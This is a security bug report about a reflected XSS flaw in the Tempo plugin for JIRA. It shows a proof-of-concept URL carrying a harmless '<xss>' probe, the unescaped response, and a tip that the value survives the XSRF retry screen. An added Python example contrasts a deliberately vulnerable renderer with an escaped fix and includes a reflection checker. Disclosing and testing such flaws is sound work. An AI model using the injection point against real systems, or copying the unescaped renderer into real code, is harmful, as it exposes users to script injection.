XSS in /secure/admin/TempoServicesAccess.jspa

Type atlassian
Reporter sverrir
Modified 2017-04-02T05:04:42


The {{allowedIpAddresses}} parameter is passed unfiltered into the results page. Contents of the field persist through the "missing XSRF token" screen, so exploitation is trivial: just get your victim to click on the link without a token.

{noformat}
/secure/admin/TempoServicesAccess.jspa?allowedIpAddresses=%3Cxss%3E&atl_token=BYRO-9FU9-UCXC-E6R7%7C1abd1e4580f1776e7c4a257414640e59c92fc1b0%7Clin&atl_token_retry_button=Retry+Operation
{noformat}

Response (the value is reflected unescaped in two places in the page):

{noformat}
<tr class="descriptionrow">
    <td class="fieldValueArea" colspan="2">
        <div style="width: 80%;" class="aui-message error">
            Misprint in Allowed addresses? Please check and save again. The offending input: <xss>

<td class="fieldLabelArea">Allowed addresses</td>
<td class="fieldValueArea" bgcolor="#ffffff">
    <textarea style="width:90%" rows="10" cols="50" id="allowedIpAddresses" name="allowedIpAddresses"><xss></textarea>
{noformat}

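A minimal reproduction of the two reflection points and of the fix, added here as an illustration (this is not Atlassian's or Tempo's code). {{render_vulnerable}} and {{render_fixed}} are hypothetical stand-ins for the server-side output quoted above, built from the same two fragments; {{raw_reflections}} is the check a reporter would run against the fixed build: count verbatim occurrences of the {{<xss>}} probe in the response body, which must drop to zero once the value is entity-escaped at both output points.

```python
"""Reflected XSS check for the allowedIpAddresses reflection points.

Added example for the report above; not Atlassian's or Tempo's code.
The two render_* functions are constructed stand-ins for the response
fragments quoted in the report (validation error message + repopulated
textarea). They are not the real templates.
"""
import html
import re
from typing import List

# Same harmless marker the report used in the URL (allowedIpAddresses=%3Cxss%3E).
PROBE = "<xss>"


def render_vulnerable(value: str) -> str:
    """Constructed stand-in for the buggy output: the submitted value is
    concatenated into both the error message and the textarea with no escaping.
    In the textarea context a value containing '</textarea>' would break out
    into raw HTML; in the div context any tag is live immediately."""
    return (
        '<div style="width: 80%;" class="aui-message error">'
        "Misprint in Allowed addresses? Please check and save again. "
        "The offending input: " + value + "</div>\n"
        '<textarea style="width:90%" rows="10" cols="50" id="allowedIpAddresses" '
        'name="allowedIpAddresses">' + value + "</textarea>\n"
    )


def render_fixed(value: str) -> str:
    """Same markup with the value HTML-entity-escaped at both output points.
    html.escape(quote=True) turns < > & " ' into entities, so neither the
    div nor the textarea context can be escaped from."""
    safe = html.escape(value, quote=True)
    return (
        '<div style="width: 80%;" class="aui-message error">'
        "Misprint in Allowed addresses? Please check and save again. "
        "The offending input: " + safe + "</div>\n"
        '<textarea style="width:90%" rows="10" cols="50" id="allowedIpAddresses" '
        'name="allowedIpAddresses">' + safe + "</textarea>\n"
    )


def raw_reflections(body: str, probe: str = PROBE, width: int = 40) -> List[str]:
    """Return a context snippet for every verbatim (unescaped) occurrence of
    the probe in a response body. An empty list means the probe only appears
    in escaped form, or not at all."""
    hits = []
    for m in re.finditer(re.escape(probe), body):
        start = max(0, m.start() - width)
        hits.append(body[start:m.end()])
    return hits


def is_vulnerable(body: str, probe: str = PROBE) -> bool:
    """True when the probe is reflected raw at least once."""
    return bool(raw_reflections(body, probe))


if __name__ == "__main__":
    for label, page in (("vulnerable", render_vulnerable(PROBE)),
                        ("fixed", render_fixed(PROBE))):
        hits = raw_reflections(page)
        print(f"{label}: {len(hits)} raw reflection(s)")
        for h in hits:
            print("   ...", h)
```

Against a live instance the same check applies to the body returned for the report's URL, and to the "missing XSRF token" retry screen, since the report notes the field contents survive that screen as well.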

This is probably in the Tempo plugin rather than JIRA core, given the {{TempoServicesAccess.jspa}} action.

See fixing HOWTO at https://extranet.atlassian.com/display/SECCOUNCIL/HOWTO+-+Fixing+JIRA+Security+Issues